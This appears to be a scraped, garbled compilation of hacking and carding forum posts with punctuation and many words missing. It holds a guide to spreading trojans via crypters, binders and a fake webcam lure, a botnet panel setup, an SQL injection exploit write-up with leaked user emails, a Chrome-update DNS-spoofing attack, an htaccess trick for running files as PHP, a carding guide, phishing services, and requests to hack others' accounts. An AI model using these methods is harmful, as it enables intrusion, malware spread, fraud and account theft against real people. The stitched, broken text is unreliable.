santa monica unknown united states checked socks. 
roanoke united states checked socks. 
saint augustine united states checked socks. 
need hack please help some experts. 
everyone here tut website attacks with sql injections kali linux link. 
zip content website attacks with sql injections. 
sql injection part cheers ult. 
thank you lets see. 
euro wrote rainbowconnect wrote mailer inbox free script clean. 
yahoo gmail url where can get host for unlimited spamming. 
trying this now running fast. 
thanks for the post. 
are sure its clean and how can check. 
united states blacklist checked. 
thank you nice sharing. 
nickron wrote just sign here and confirm your account receive usd lets try hope its not scam. 
pro inc dorks and sql vulnerability scanner complete set. 
run admin havij wont work. 
antivirus can detect virus because the nature reathe program. 
its one the best sql injectors. 
kaljl illz lxrjmsyw tjw xhjsuuyu xvvl ftjyvpo url really hope this woks. 
hope this works for filter sure annoying. 
thanks this really cool does work. 
again nice share bhai. 
will see this hidden. 
download links are dead. 
hang provide working link. 
thnx very useful tool. 
kindly share the correct link for. 
com united kingdom blacklist checked. 
ile france france blacklist checked. 
tamil nadu india blacklist yes checked. 
com india blacklist yes checked. 
download jpg exploit for low mega pixel. 
supports rat and botnet download. 
first find create the. 
htaccess file the target directory. 
htaccess will only effective this directory although depending how apache set may affect other folders recursively next put the following code code addtype application. 
txt this will make all. 
txt files the affected directory parse they were. 
the scope this isn't limited just. 
txt files either though. 
you can actually make any type file parse were. 
php file including filetypes that don't even exist that have nothing with text data. 
for instance code addtype application php. 
hax with that the. 
htaccess file any file with. 
hax extension will treated was. 
let see this hahahaha. 
arpa united kingdom blacklist checked. 
oregon united states blacklist yes checked. 
virus scans the program. 
neoh ker wrote email cracker img img this program will crack almost any email all you need password list and the email providers smtp and port seen the gif above. 
com then enter the email crack and now you need password list enter location the list then let the cracker its work few smtp see full list here url smtp. 
net port pass list download link. 
thanks for the link bro. 
wrote send sms and call pranks any number. 
real person will touch with the number you provide download virustotal. 
link dead will reupload later. 
trying hack this site. 
the admin login page url. 
anyone have idea for this thanks i'm using kali linux hack sent from ipad using tapatalk this web using nuke viet cms sent from ipad using tapatalk. 
thanks for the help with network exploitation. 
nice post sent from using tapatalk. 
egyptian hackers hacked almost comical lol. 
html the royal barbados police force the web site you are accessing has experienced unexpected error. 
please contact the website administrator. 
the following information meant for the website developer for debugging purposes. 
error occurred while processing request error executing database query. 
macromedia sequelink jdbc driver odbc socket microsoft odbc microsoft access driver unknown not valid path. 
make sure that the path name spelled correctly and that you are connected the server which the file resides. 
the error occurred cwwebhosting barbadospolice. 
cfm line select from ticker sqlstate sql select from ticker where active 'yes' order faqs desc datasource police resources check the coldfusion documentation verify that you are using the correct syntax. 
search the knowledge base find solution your problem. 
referrer date time nov stack trace cfheader ecfm. 
sqlexception macromedia sequelink jdbc driver odbc socket microsoft odbc microsoft access driver unknown not valid path. 
tosqlexception unknown source macromedia. 
cnvdiagnostics unknown source macromedia. 
decodebody unknown source macromedia. 
decode unknown source macromedia. 
send unknown source macromedia. 
logon unknown source macromedia. 
connect unknown source macromedia. 
open unknown source macromedia. 
connect unknown source coldfusion. 
hope this works really need get only inside one profile that's. 
can that manually also. 
thanks for sharing this tool. 
today made auto typer and auto clicker. 
they are simple use. 
made them the auto clicker does click every second. 
the auto typer does message per second. 
could make new ones faster slower. 
will probably try them with intervals aswell. 
here the virus scans code. 
com file ffd dac analysis code. 
com file dae cfe ddcc analysis download links code. 
let take look and see works. 
instagram account was hacked. 
february and need help getting the account back. 
tried reporting instagram and they've done nothing about. 
tried emailing them and again they did nothing. 
tried hack myself which didn't work either. 
this person has been account for weeks now pretending. 
can someone help hack account. 
romania blacklist yes checked. 
thank you much brother. 
amionxp wrote hello again guys offensive comunity after shared the cryptersoucre now time for botnet source all this botnet still source and most them make using and here link download password for the rar. 
indeed good job bro. 
can oneone share video tutorial. 
will check once now. 
txt put here email. 
california united states blacklist yes checked. 
salam it's very simple first cahng suspandig page code your index from resller using this command code nano var cpanel webtemplates root english suspended. 
tmpl than run this command putty for suspanding all sites code for var cpanel users scripts suspendacct done and this command for unsuspanding sites code for var cpanel users scripts unsuspendacct done good luck. 
great thanks man appreciat work. 
thank you appreciate your hard work explain the tutorial. 
very good support very good support very good support. 
the name god the merciful sometimes you can found root password simple files very easy often the passwords saved log file for user this case the server not enabled user mysql option file saved some this extension code pid. 
conf inthis pathe code usr local mysql data these code var lib mysql var run mysqld when you open the files you will found lik this for this you must look suspicious files good luck. 
thanks for great inform shout. 
just what was looking for. 
python programming for hackers. 
getting started after video you can follow textual explanation below welcome this new how series student video tutorial. 
name bijay and i'll teaching you complete series python programming for hackers. 
this first part part introduction course outline setup process. 
why python python favourite programming language. 
with its decreased complexity increased effeciency limitless thirdparty libraries python provides excellent development platform build our own tools ethical hackers term it's called offensive tools. 
python allows rapid development testing essential abilities for ethical hackers pentesters security professionals. 
python hackers' language read connor's book believe that. 
definitely python hackers' language. 
who should watch this training series basically recommend this training series beginners actually this training series for those who wants learn python and then aims apply the field cyber security pentesting even ethical hacking. 
what will covered this training series first thing first yes will start from 'hello world'. 
then will see some basics python programming. 
such variables it's types operators strings conditions loops. 
then will get dipper start playing with scripts ethical hackers. 
such penetration testing with python web analysis with python network traffic analysis with python forensics analysis wireless exploits. 
along with tutorial series write some scripts utilize many built scripts modules python for port scanning vulnerability assessment geo locating criminals with address different types exploits investigating with forensics toolkit detecting malicious toolkits browsing anonomously with python and lot more. 
python programming requirements well what need start thing need ide for python. 
org downloads then select appropriate file whether it's for windows else. 
will using windows also kali linux. 
case kali linux can use pycrust can terminal and type python then can use along. 
except these you have any other then manage your own. 
next thing during the series tutorial need party library files and setup tools. 
will not mention those tools now because will seeing those later this tutorial and will use them when need them. 
zimbra wrote hello without bla bla let's start hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see. 
nickron wrote just sign here and confirm your account receive usd let see. 
moscow city russian federation blacklist checked. 
rio grande sul unknow brazil blacklist yes checked. 
missouri united states blacklist checked. 
tax for the share will chec out asapblazelord wrote very easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like enjoy. 
nickron wrote just sign here and confirm your account receive usd trying this right away thanks. 
codefire wrote how setup own botnet iht booter. 
iht step step noob friendly step wise process for bots setup first need bot full script and booter. 
exe for download basic requirement for bot subdomain hosting patience step your cpanel and click subdomain icon now create subdomain like kiddie. 
step create mysql database mysql database wizard then enter database name. 
hacked click next button then enter database username and password. 
user name kiddie password hackme then click create user when the user created will redirect the page where have set user privileges for this select all and click all privileges and click next step phpmyadmin import the database file into phpmyadmin for this click your database name click import browse. 
sql file now your sql file uploaded successfully uploaded. 
step upload all files from iht booter. 
zip web panel via ftp you can use filezilla for uploading step web panel folder inc connection. 
php edut this file notepad. 
and enter your mysql details. 
save and close now all settings are done now try open bot open subdomain username root password toor user and password are set default please change after login. 
next tutorial will show you how make bot and how spread internet. 
stay tuned guys thanks for visiting this site hope you enjoy the game. 
you like tutorial please posts comment here. 
connect with part finish logout. 
need someone work with that can setup well crypted rat that will almost invisible any anti virus. 
you must have access all tools that required available and time tutor how use these tools. 
luckmangamer wrote think makers idm are chutiya. 
they also know that crackers have created patch that activates their any version but then also they keep introducing new versions. 
have never paid for idm and still having the new version without spending even peny. 
but would really like thank idm makers introduce such good software. 
thanks idm makers thnx you really appreciate their work then please buy this software that they can earn something just don't cool hhaha. 
and also i'm not rich pay them. 
lemme check that works. 
thanks for the tool hey where the download link. 
thx ill look onto this. 
silly botnet functions commands. 
kill terminates it's own process. 
dotnet chan has dotnet install joins specified channel. 
recon reconnects channel after minutes download. 
exploit title google dork inurl menu. 
php restaurantid date exploit author tutmoses vendor homepage. 
com software link must contact them version not sure dont have the software tested linux mostly but php you know cve place get parameter restaurantid type boolean based blind title mysql boolean based blind where having order group claus rlike payload restaurantid rlike select case when then else end type error based title mysql. 
and error based where having clause payload restaurantid and select from select count concat select case when then else end floor and from information schema. 
character sets group vulnerability occurs due lack sanitation restaurantid parameter menu. 
php restaurantid and select from select count concat select case when then else end floor and from information schema. 
character sets group etc remove after review please afa cmscms oscarescalando gmail. 
com null bfd null ffc rudy rudy clickmyslice. 
com null null ccf test wuilliam gmail. 
com null ebd bdbad null afa oscar oscarescalando gmail. 
com null bfd null afa pita oscarescalando gmail. 
com null please remove just proof just hoping they approve not there you guys have fun. 
dont think this will work. 
dagestan russian federation blacklist yes checked. 
dear customer please check our site for new update click the link below continue link. 
payment methods bitcoin perfectmoney. 
need some one that can clone sim for with just providing them the phone number possibly had guy who used for but for past few months cant get hold him and need doing asap any one one here can. 
pratham wrote hidden content you must reply see linksin this tutorial will show you how spread your trojans viruses etc. 
will show you many methods and later you choose which one you are going use. 
what spreading spreading the way your trojans programs viruses circulates around the internet. 
the point spreading put something hard find which people like. 
it's about what all people want but don't have yet. 
well the goal spreading get more victims your rats keyloggers whatever. 
getting started well spread you will need program bind your virus with. 
you want get more victims try find small program advoid large programs. 
you don't have any ideas search around the internet you will find lot fake programs such keygenerators gold hackers etc. 
other way make your own programs it's easy all you need little programming knowledge you can find good source around here. 
now the main part you want your spread successfully make your viruses fud avs. 
make your viruses use binder crypter. 
most public binders and crypters are detected even they are fud will detected soon the best way use private stub and will stay longer fud. 
there are many crypters and binders you can use just the sellers section search around the internet make sure test your virus after crypting binding because some binders and crypters corrupt the files. 
hint for beginners you already know this skip this part crypter programs that makes other programs fud encrypting them. 
binder program that makes other programs fud binding them with another file. 
means undetected only few antivirus programs detect. 
fud means fully undetected antivirus detect. 
how and where spread well guys this the part who all were waiting for. 
will show you few methods how spread you viruses and trojans. 
omegle omegle brand new service for meeting new friends. 
when you use omegle pick another user random and let you have one one chat with each other. 
chats are completely anonymous although there nothing stop you from revealing personal details you would like. 
you can use omegle auto spreader while you sleep when you are free. 
you can find omegle spreader here spreader. 
youtube youtube video sharing website which users can upload and share videos. 
make 'short' video longer than seconds minute. 
the description make short tutorial how use the program the keygen you binded your virus with add the features the program and put download link your virus. 
take picture proof aswell that will make people trust your virus more. 
make sure you use good file hosting because for example rapidshare won't let them download first time people will get bored and won't download. 
use mediafire awesome host and allows you see the downloads aswell. 
java drive applet well this nice method spreading you virus. 
first all for this method you will need url ave. 
next step download the java files. 
url now login your fileave account upload your keylogger rat whatever and copy the direct link for your virus. 
then the folder with javas and open index. 
html right click open with. 
now where says replace with your virus 'direct' link. 
you should replace your virus twice. 
now goto image mtck. 
after you login upload all the files from the java's folder. 
and you're done setuping the java applet. 
next step visit the website are going spread. 
the website url there are lot horny men who will anything see female cam. 
register account there call hornyteen something similar use real mail they will send you the password via mail. 
after you register it's time turn into girl will using manycam fool our victims into beliving are females who are cam. 
download manycam from url and install. 
once manycam installed open. 
now open manycam and select effects the left hand corner. 
once selected click text over video the left hand side. 
one selected you will see option named show manycam. 
com logo untick this option that the manycam icon disapears. 
next select source once source selected the left hand side select movies then you can see you can browse movies saved your computer and play them your webcam you could always find videos youtube and downloaded them using youtube downloaders download some home made porn videos from porn websites. 
url url url url alright after you have got your video prepared account registerd. 
log into url with the username and password you registerd with. 
the top the website you should see button named broadcast click then select your options and broadcast all the horny men during you being cam press the stop button the movie manycam that the screen goes black. 
once you have done this say your chatroom something like omg cam has stoped workin here but its working. 
anyone help and they think awsome will there and get see her strip but when they visit your site java popup pop and asks them run cancel and. 
people this website have java and will say yes. 
there you have your infections. 
not getting many people visiting your rooms think helps you set display picture google and find some nice real looking picture girl sucking cock something and while your url the top were you found the broadcast button click edit then click edit images then upload your new image. 
garena garena free multifunction game platform that allows gamers interact organize matches and play their favorite games online with tens millions players. 
first download garena client from here. 
after you download garena install and open. 
you'll need garena account you can create one seconds you need account. 
people garena are really stupid and will download your viruses for sure you make looks real you can bind your virus with war maphack you can find here here use other hack tools depens which rooms you are going spread. 
after binding your file each room and enter you download link. 
com hfsdf free maphack exp hack ladder win and more and get downloads per day. 
forums this really great method and you'll get lot downloads everyday. 
first all you'll need multiposter ultimate version recommended you can use the trial one which limited with forums only. 
you are going buy the full version you will need forum list. 
you can use google the more the forums are the more are the downloads. 
you will need templates search google now you have register the forums know it's boring but you have. 
get rid use roboform which you can get from url. 
install and open and start registering. 
after everything done start posting things like winrar crack versions programs etc. 
get more downloads use screenshot the program the thread. 
you have troubles with screenshots download icsnap from here. 
useful tool which upload pictures images from your desktop imageshack directly. 
now download easy post creator it's useful tool aswell which saves your posts. 
now you can save your posts and you don't have rewrite them twice just copy them from easy poster and post them other forums. 
torrents torrent small file around few kilobytes with the suffix. 
torrent which contains all the information needed download file the torrent was made for. 
you can use public torrents such url url url you can use private torrents they are the best because people are trustworthy there. 
facebook facebook social utility that connects people with friends and others who work study and live around them. 
you can use facebook for spreading your viruses asweel. 
join some groups and upload your virus any hosting website and tell them that this private photo viewer something like this and they will trust you. 
mirc the most popular shareware irc chat client for windows. 
you can use spread you viruses join any network and start spamming with your links all channels saying free psybncs eggdrops etc most people will download depens which network you will use some networks are made for gamers etc. 
thx for sharing check out. 
thanks you for sharing. 
jedan dva tri cetiri pet. 
i'm python php developper you need any custom made tool script even bot just contact and i'll code for you don't hesitate. 
hey guys i'm partially new here just wanted little bit help with mitm attack. 
suppose successfully cracked neighbours wifi using evil twin method and now want man middle his smart phone his whole network possible question here that most nowadays use smart phones use facebook mails etc and not just browser and then facebook. 
com right that possible thanks. 
hello need this mailer please thanks. 
vseries wrote hacker dear webcards members are glad inform you that great updates has been added and prices has been reduced fresh rdp usa and europe rdp admin usa strong inbox smtp direct inbox mailer direct inbox webmail rdp with local host inbox fresh shells skype accounts fresh cpanels fresh email leads fresh email and password all those and more only our shop. 
biz all payments are automatic instant perfect money bitcoin webmoney thanks mate. 
thanks alot hope its good. 
thnx for sharing bro. 
will try and tell you works. 
pratham wrote happy new year. 
this small gift from. 
want share with private shell cyber army reply here view the download link. 
you have look the link. 
xprogrammer wrote blink blink cracking basic crackme with programmer blink blink welcome tut this tut mainly for newbies this tut will show you how find serial for basic crack and patch making accept any serial. 
download here hope that you will learn something from this tut greetz blue lordcoder cybotx phoenix and other team members team uret and reis. 
note just educational purpose the crack used tut not development just used show something. 
source blink blink thanks for your tutorial. 
rar password vipunderground download all mail password cracker. 
bmp gmail hotmail yahoo yandex successfully finds passwords for mail and many more. 
thanks was looking for this. 
looking into this i'd love and use. 
thanks for charing and waiting your news awer forum. 
rafiqctg wrote friends enjoy dont change password url pls can you send the info. 
thanks mate hope this not backdoored. 
very good man thanks for sharing. 
can teach you about sqlmap and give nice tutorial want. 
need someone who can get good list usa mail with pass. 
need you teach hacking can you add yahoo segseg yahoo. 
wondering where this went. 
good post dude thanks. 
thanx dear please give more. 
com united kingdom blacklist yes checked. 
azarbayjan bakhtari unknow support. 
net iran islamic republic blacklist checked. 
germany blacklist yes checked. 
com canada blacklist checked. 
thanks bro for valuable thng. 
want see downloading link thanks. 
wow nice dude let try this one. 
thanks for sharing steps can give the download link sms spoofer. 
hello hackers and newbies don't forget hide your before doing anything. 
thanks for shring dude. 
this very dangerous exploit kit can exploit centos debian redhat etc tests for bit and bit well exploits the machine itself through perl script and reports back secure report page made store the info about each root takes using the maxmind geo database will log the the machine state city and country box well for root column database well unique for each bot uses and cves and touts every known exploit for linux known man believe makes enlgihtenment look like toy backstory did not write this found back few months ago the hayday heartbleed vulnerable indian site that served music over millions people was infected with this and used distribute the exploit kit hacked box this how will work hacked machine makes request server holding exploit kit tmp wget. 
this will grab the perl tester from host than download the exploit kit succesful will report back the database coded the sql database and tables and coded the php script that used for reporting secure and guarenteed work the machine doesnt have execute privileges turned off you should golden can set and all that for you believe this was government inspired exploit kit definately not public and was targeting foreign country when found this was only missing the report page after reversing the perl code following its execution flow made own report page not very hard they were only exporting int and varchar etc maybe diff type but will fit was easy whip poc for and works great will only accept money that cannot traced such litecoin bitcoin etc dont waste fucking time want something one has can get wont charge you too much but fuck get and spread fucked your gonna pay its worth serious inquires only. 
can anyone help bypassing firewall even not able open youtube. 
size click here for download size size click here for download size. 
unnamed wrote try resetting their password you might know their secret questions personal information. 
thankyou for the advice have tried and failed with those methods but appreciate your replies. 
looks promising gonna give shot. 
thanks will check this out. 
cardable nike method hello indianhacker member this small guide how card the official nike. 
com store this method has been tested various users this month and they had success rate this method may not work very soon try soon you can. 
requirements rdp works with premium cyberghostvpn premium socks drop location pretty common sense you don want anything backtracked yourself visa master with high good balance better chance with private but public can work too just get fast you can note smart never copy and paste numbers information act like real customer browse and type your information. 
login your rdp via remote desktop connection check make sure nice and stable. 
start your web browser and sure clear the cookies cache and history. 
check that your address not blacklisted and also check the location matching the cardholders. 
you using socks vpn change the timezone the computer the same timezone that the address located too. 
the official nike store. 
com select the product you want order and add your cart. 
your basket and select the free shipping option then checkout. 
select guest checkout and fill the required details your billing address the drop same your shipping address. 
enter the cards information number expiry date and cvv. 
check the billing details are the same shipping. 
use fake phone number but make sure that similar the number that the shipping location too. 
make mail address relative the name you chose ship too for example you ship using the name joe bloggs you want have mail like joe. 
com gmail best use. 
place the order and wait for your confirmation mail product shipment will approximately take hours ship your order patient. 
thanks for this lets see how this works. 
will check that thanks for share. 
thank you will try out bro appreciate. 
great way make but you want earn more than that just buy account happy miner and some gold mining and you could sell virtaex. 
com expensive price mine sold for. 
check happy miner coupons website. 
looks solid man thanks for the leak. 
this looks like something could try and succeed with. 
org united states blacklist checked. 
nebraska united states blacklist checked. 
illinois united states blacklist checked. 
indian hacker member new this site and this first post today will tell you the easiest way perform phishing free fake pages. 
visit this link and register then get you own personal free fake pages. 
com inviteses example site available facebook tweeter paypal skype etc. 
you dont need bother yoursself finding proxies combo config etc. 
lets try his shitafdsaf. 
hope this still works. 
thanks buddy for sharing. 
lmfao love your desktop backround. 
have several fishing videos copied from dish receiver hard drive. 
does anyone know way that can get these recordings computer into. 
wmv any other type. 
kirklees cpc heck cust. 
rafiqctg wrote friends enjoy dont change password url free hugs. 
nice post bro keep. 
like learn how dona. 
hey everyone know that many use online client. 
today have found hack any one interested. 
let see and will decide. 
you can download from here for free hello need. 
gotta replay learn bro. 
boy free money everybody have time fo' dat. 
how did you hacked these. 
everyone relative mine has old hotmail. 
com adresses that redirect his new gmail adress. 
want have access his hotmail stored mesages. 
know the person with date birth can his computer rarely but still better than nothing have emails sent from his adresses containing pictures can know his. 
there are firewall and antivirus his. 
usually know days advance when i'm going his house can not ask him hey man why dont you log you hotmail account for fun while the toilet. 
unknown may only have acces guest session since the person redirects its hotmail emails its gmail adresse the person might not type its hotmail often. 
dont wish this person being hacked others than. 
what techniques would the best try. 
does this give you access the numbers previous whatsapp messages thank you. 
thank you for providing info. 
blues wrote vyrus wrote all mail password cracker. 
thanks for share hope will work. 
need this now let see. 
omg thanks bro ill try. 
have idea what this means but sure after time will get there. 
its mad but will try. 
seems cool thank you. 
wrote yea you heard correct its leaked not believe take look the link enjoy mike can't wait have look thank you for sharing. 
checking this out hahaha. 
would nice see hear from someone works. 
perfect love utorrent need love torrent one favorites. 
let try this tool. 
com ggd djcj please say thanks this program has been made for educational purposes only. 
thanks bro will try. 
should you not title this particular method cos hacking ccs broad from injections phish botnets dns spoofs the list long. 
thanks want take look. 
pogomap map nearby pokemon pokestops and gyms pogomap aiming bring live visualization map nearby pokemon pokestops and gyms form web app well native phone applications. 
can self hosted and installed windows mac and linux with android and ios ports currently development. 
basic installation prerequisites installation will require python. 
ubuntu debian you can install the required packages ubuntu running the following command code sudo apt get install python python pip nodejs npm red hat centos fedora you can install required packages red hat running the following command you may also need install the epel repository install python pip and python devel. 
code yum install epel release code yum install python python pip nodejs npm python devel comes with some outdated python packages. 
these instructions tested capitan you will need install code pip then upgrade few python packages. 
instructions run everything each its own line code curl. 
sudo easy install upgrade six sudo easy install upgrade setuptools sudo pip install requirements. 
txt install node and npm download and install the installer from. 
when installing check that python location gets appended path. 
right click that link and choose save link and double click the file you downloaded assuming you installed python correctly. 
org download and install. 
there one click setup for windows. 
after you installed python into the code easy setup folder and run code setup. 
this should install code pip and the dependencies for you and put your google api key into the right place. 
installation complete once installed opening terminal cmd. 
exe prompt and typing code python. 
help should net you this output code python. 
auth service username password location step limit scan delay thread delay login delay host port locale gmaps key num threads type type name name user user pass pass host host webhooks webhooks. 
args that start with. 
can also set config file usr src app pogom. 
the recognized syntax for setting key value pairs based the ini and yaml formats. 
key value foo true. 
for full documentation the differences from the standards please refer the configargparse documentation. 
arg specified more than one place then commandline values override config file values which override defaults. 
optional arguments help show this help message and exit auth service auth service auth service auth service username username username username password password password password location location location location can address coordinates step limit step limit step limit steps scan delay scan delay scan delay time delay between requests scan threads thread delay thread delay thread delay time delay between each scan thread loop login delay login delay login delay time delay between each login attempt display console display found pokemon console host host host set web server listening host port port port set web server listening port locale locale locale locale for pokemon names default check locale folder for more options china coordinates transformer for china debug debug mode mock mock mode. 
starts the web server but not the background thread. 
starts the searcher but not the webserver. 
only server server only mode. 
starts only the webserver without the searcher. 
fixed location hides the search bar for use shared maps. 
gmaps key gmaps key gmaps key google maps javascript api key cors enable cors web server database filename num threads num threads num threads number search threads pokemon disables pokemon from the map including parsing them into local gyms disables gyms from the map including parsing them into local pokestops disables pokestops from the map including parsing them into local type type type database used default sqlite name name name the database used user user username for the database pass pass password for the database host host hostname for the database webhooks webhooks. 
define url post webhook information credentials and downloading create pokemon club account their official website used the program search for pokemon. 
this generally shouldn the same your main trainer account you personally use. 
this page unavailable most the time refresh the page every minutes and should allow signups eventually. 
you can also use google account. 
for both services you can login without ever connecting the actual game. 
then download one the following branches below. 
com pokemongo map zip develop the dev branch will have latest features from the development team however may unstable some times. 
extract this zip file any location. 
install dependencies now open terminal command line code win code and code cmd windows and code the folder you extracted the zip file. 
code some directory windows you can also right click within the folder and select open command window here. 
then enter the following code pip install requirements. 
txt npm install google maps api key you will need generate your own google maps api key and place your program directory use this program. 
com pokemongo map how this part. 
running start the server run the following command code python runserver. 
username password google maps api key location for google account code python runserver. 
google username password google maps api key location replacing username and password with the pokemon club credentials you created previously and location with any location for example code washington. 
latitude and longitude coordinates such code. 
additionally you can change the code after code any number. 
this number indicates the number steps away from your location should look higher numbers being farther. 
user sven the promise. 
pass steve user gmail. 
com pass user andreaskupfer msn. 
com pass doomhammar don't change the password the account not working. 
ill try and get back. 
how protect yourself against phishing. 
what phishing phishing the method stealing login info usernames and passwords directing the slave clone fake login page that logs the login info without the knowledge the slave. 
such clone website known phisher. 
how protect yourself against phishing use your login info the correct places only. 
don't ever put your login info anywhere else than the page you registered unless it's trusted service you know such youtube blogger asking for your google account's info. 
make sure the website you're logging isn't fake. 
whenever you login website you didn't type the url address the website yourself. 
you clicked link that led you the login page from message website search engine results always check the url address see you're the right place. 
for instance you're logging your facebook account make sure the url appears. 
where phisher page would look like. 
any url whose part before the. 
com isn't exactly the same the page you want login. 
make sure the links you're clicking aren't fake. 
whenever you're clicking link check where the link goes before clicking. 
links can masked appear something else than the page they're leading. 
com leads yahoo instead google. 
fortunately most browsers whenever you point your mouse cursor over the link the true location the link displayed the bottom left part the screen. 
try with the above link. 
this particularly important because can protect you from another rarer but more dangerous method called cookie stealing which basically automatically stealing your account you're previously logged the website. 
know that links phishing pages are usually spread via email and often represent impersonating trusted services and persons such making the email appear it's sent from the website you've registered friend yours whose account has been compromised. 
what you have spotted phisher report the phisher soon you can. 
report the phisher's address here. 
com safebrowsing report phish the phishing attempt has been done via message report the message any the following services. 
gov nav report phishing. 
html you received the message from friend's compromised account inform your friend and other friends that might danger. 
possible inform the admin the website forum that the phisher made for. 
let's how works out. 
guyz hardly need help finding vulnerability clg site. 
aim become white hat hacker but break sir's challenge need enter into this site need your help. 
need this bad but the problem getting good host host. 
let see how true this and how worksa. 
think problem will bypassing the suspicious activity notification these sites gmail hotmail etc. 
actually have all the logins and passes. 
gotta try this out. 
really like job man. 
plz send the download link has been removed from. 
mail address dork filetype doc gmail. 
com username and password dork filetype doc username filetype doc password filetype xls username filetype xls password filetype csv username filetype csv password example url. 
org student scc reg. 
csv mail list info. 
edu use mail grabber tool. 
can't find any hacking tools nowadays for linux hope this for linux. 
stealing files from phone memory and card. 
stealing whole whatsapp chat decrypted form plain text using twitter command control centre this will make persistent give command via twitter new technique such that cannot compromised you can keep hopping servers that even botnet network doesnt goes down sms relay sending sms victim phone from another infected phone. 
phishing application collect user and password similar concept web phishing like facebook gmail. 
can include other application request other features can included per request free upgrade and bug fixes any one intrested buying send private message. 
blazelord wrote very easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like enjoy take look. 
present you blackw the worm has lots options very easy configure like rat but with lot more options let you discover you even through its screens font color installation tutorial necessary the worm server can encrypted using the tools available the forum color. 
link download scan antivirus virus total. 
almost fud the moment. 
color please leave your comments and nice this first topic the forum color. 
here are some free smtp servers. 
healping modi make india great place nicee. 
now icq hackerreal yahoo. 
before donate will give personal skype number pro. 
before donate will give personal skype number eyvallah barek billurlar gurban. 
guys i'm dropping nice pdf wich covers protection against zerodays days i'm sure comes handy. 
first post certainly not last got loads quality posts watch. 
intro consider any internet facing server vulnerable least from time time. 
therefore need set these servers accordingly and should abide the following conceptual. 
always expect the hacker place malicious payload into the server's memory. 
the hacker's payload placed the service's memory expected gain local admin privileges which not that easy the way working scenario. 
com misc downloads compass event kurz. 
hidden pages interested learning will know how good when see the hidden content zimbra wrote hello without bla bla let's start hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see all the videos are not available youtube anymore zimbra wrote hello without bla bla let's start hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see. 
hello without bla bla let's start hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page. 
com register and get link fake page facebook any other service. 
com watch totmnyhgrl creat you'r one fake link. 
com watch asve wieite also use all the fake page get vip membre. 
com watch kbneba hope you like see. 
have check this one asap. 
this person has been account for months now pretending. 
need account back asap. 
enjoy first skip the add than enjoy those pass username awesome thanks bro. 
warning this not spoonfed tutorial. 
you are looking for easy automated way this look elsewhere. 
suggested requirements apache and ettercap backtrack givens. 
are the victims let's begin google chrome has great little auto update feature that runs every minutes and downloads and runs update exe. 
tricking the slave's computer into thinking you are the update server you can make anyone running your network run your exe silently. 
let's start off with the basic background knowledge. 
we're going need dns poison the network and tell them that you are the update server. 
please note commands are done running backtrack code find etter. 
dns copy the path etter. 
dns and then code nano path etter. 
dns you will presented with the edittable dns file. 
you want add entry code tools. 
ctrl and save that shit. 
now lets set our server server virus. 
exe direct all requests your server the following xml document will make. 
for more info the xml format see google's omaha server protocol first need gather our info. 
are hitting bit chrome bit for this example i'll doing bit but you can easily grab the for bit with wireshark. 
bit means that appid dba now have our virus. 
exe take the sha base hash the virus. 
exe vxriguvi tnqfllu vbel then craft our xml serve code. 
exe required true size. 
exe host the xml the root your server along with virus. 
exe then open ettercap and code ettercap wlan dns spoof arp and now anytime goes update will grab your virus instead the actual update. 
thanks for this hope its working. 
good need try this. 
when jdjdjd jejsjd djdjd just djdjd end kddk. 
user pass tthlpzcp valid only for one day. 
skype resolver api setup these are instructions for setting the skype resolver api windows vps from scratch deadcode. 
downloads for everything are the bottom. 
there possibility that skype will block the account you use for this make sure you don't use your own and don't use your own from the same address the resolver. 
changing account and address will let the resolver work again. 
the php script has option outputting json pure text which configurable line setting json true json false. 
you can't manage any these steps figure out something it's slightly different than i've described this not for you. 
not about will not help you. 
download and install microsoft. 
download and install wamp. 
click the wamp icon the system tray and click 'put online'. 
once that set services and disable the 'wampapache' service from starting and stop the service from running. 
instructions disbaling service are here you aren't sure how. 
wamp bin apache apache bin and run. 
should appear black console window. 
copy the 'sdks' folder the root the drive. 
you should have sdks skype skype com. 
dll' and sdks skype skype comlib. 
dll' when this done. 
open your wamp folder and copy 'index. 
exe' and the 'skype' folder into. 
you'd prefer build your own exe instead using mine open the skype comuserprofile project visual studio and build. 
you'll need copy 'skype comuserprofile. 
exe' out the 'skype comuserprofile skype comuserprofile bin release folder into the wamp folder. 
reg' file the wamp skype folder and allow added the registry. 
this allows skype write the log files which the php script reads for addresses. 
exe' and register and login new account. 
everything set just need allow our program interact with skype. 
php name echo browser. 
skype should flash and show message asking 'skype comuserprofile. 
exe' allowed communicate with. 
click allow and we're done. 
your skype resolver running. 
there protection from crashes though skype not running the php script will return error json mode. 
exe need running all times. 
they aren't wont work. 
make sure you don't log out your vps. 
com koo qwqatv tut sib. 
looks good food loop doop. 
php dorks asp dorks rfi dorks footholds files containing usernames vulnerable servers vulnerable files error messages files containing passwords size click here size. 
thanks keep hope it's working. 
can you send the link pls thanks. 
attach config attach info commview for wifi powerful wireless network monitor and analyzer for. 
supported adapters color what you can with commview for wifi color scan the air for wifi stations and access points. 
depending the traffic volume and usage mode the requirements may hight operating systems and bit windows windows server windows vista windows server windows click here get download links. 
excellent sharing man thx. 
hey mate sent the auth codes just. 
need someone crack private email server cuba will pay. 
thanks for the guide. 
yahoo gmail url gracias por aporte eres grande man. 
awesome job bro gonna try. 
looking test websites accessing them from computer but was another persons computer different country. 
need able control the mouse this other persons computer. 
need the control tool and i'm looking for access dif computers the and other countries. 
looking for fud crypter that the right place crptex crypter dependency can crypt rat coded any language fully undetecteble features crypter extension soofer file pumper file comperrer obfuscator scanner downloader live support download. 
cool nice tip cool. 
thanks try hope working. 
lets give try happy. 
interesting this sounds and from reading you have put inplace that been decentralized this very method will have particalar aim because you could never anticipate the very side were the binary code hex encoded other words will run. 
its more orless something think they already considered before going with non centralized system. 
but was nice read and krudos for posting. 
painkiller wrote img thanks bro. 
lets have look and find out some them still work. 
